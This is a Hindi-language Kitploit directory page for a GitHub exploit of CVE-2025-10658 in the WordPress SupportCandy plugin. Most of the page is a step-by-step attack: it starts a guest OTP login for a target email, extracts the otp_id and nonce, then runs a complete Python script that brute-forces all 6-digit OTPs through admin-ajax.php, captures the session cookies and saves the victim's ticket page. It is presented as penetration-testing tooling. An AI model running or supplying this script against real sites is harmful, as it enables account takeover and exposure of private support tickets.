Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-10658 — Python स्क्रिप्ट CVE-2025-10658 के लिए: WordPress SupportCandy गेस्ट लॉगिन में 6-अंकीय OTP को brute-force करके admin-ajax.php एंडपॉइंट के माध्यम से पूर्ण खाता अधिग्रहण प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/jfriedli/cve-2025-10658
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubjfriedli/cve-2025-10658

CVE-2025-10658

Python स्क्रिप्ट CVE-2025-10658 के लिए: WordPress SupportCandy गेस्ट लॉगिन में 6-अंकीय OTP को brute-force करके admin-ajax.php एंडपॉइंट के माध्यम से पूर्ण खाता अधिग्रहण प्राप्त करता है।

रिपॉजिटरी देखें
1355 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

एक्सप्लॉइट: SupportCandy गेस्ट OTP ब्रूट फोर्स → अकाउंट टेकओवर

1) OTP लॉगिन प्रवाह प्रारंभ करें (ब्राउज़र)

  • खोलें:
root@kitploit:~
/support/
  • गेस्ट / OTP लॉगिन चुनें
  • लक्षित ईमेल दर्ज करें (जैसे [email protected])
  • सबमिट करें

2) OTP फ़ॉर्म से आवश्यक मान निकालें

DevTools → Network → admin-ajax.php?action=wpsc_authenticate_guest_login प्रतिक्रिया में:

root@kitploit:~
<input type="hidden" name="otp_id" value="NN">
<input type="hidden" name="_ajax_nonce" value="XXXXXXXXXX">

सहेजें:

  • OTP_ID
  • NONCE

3) OTP ब्रूट-फोर्स करें

root@kitploit:~
#!/usr/bin/env python3
import requests, time, sys

ORIGIN = "http://localhost/wordpress"
OTP_ID = 22                  # extracted otp_id
NONCE  = "f2349a6ac9"        # extracted nonce
START  = 0
END    = 999999
RATE   = 25                  # requests per second

AJAX = ORIGIN.rstrip("/") + "/wp-admin/admin-ajax.php"

def try_code(sess, code):
    r = sess.post(AJAX, data={
        "action": "wpsc_confirm_guest_login",
        "otp": code,
        "otp_id": str(OTP_ID),
        "_ajax_nonce": NONCE,
    }, timeout=10)

    try:
        j = r.json()
    except Exception:
        return False, None

    return (j.get("isSuccess") == 1), j

def main():
    s = requests.Session()
    interval = 1.0 / max(RATE, 1)

    for n in range(START, END + 1):
        code = f"{n:06d}"

        ok, _ = try_code(s, code)
        if ok:
            print(f"[+] OTP cracked: {code}")
            print("[i] Cookies:", s.cookies.get_dict())

            # Access authenticated page
            page = s.get(ORIGIN + "/support/?wpsc-section=ticket-list")
            open("with_cookie.html", "wb").write(page.content)

            sys.exit(0)

        if n % 1000 == 0:
            print(f"[*] Tried {n} codes...")

        time.sleep(interval)

    print("[!] Exhausted range")

if __name__ == "__main__":
    main()

चलाएँ:

root@kitploit:~
python sc_guest_bruteforce_linear.py

4) अकाउंट टेकओवर पूरा करें

  • ब्राउज़र फ़ॉर्म में क्रैक किया गया 6-अंकीय OTP दर्ज करें
  • सबमिट करें
टूल डाउनलोड करें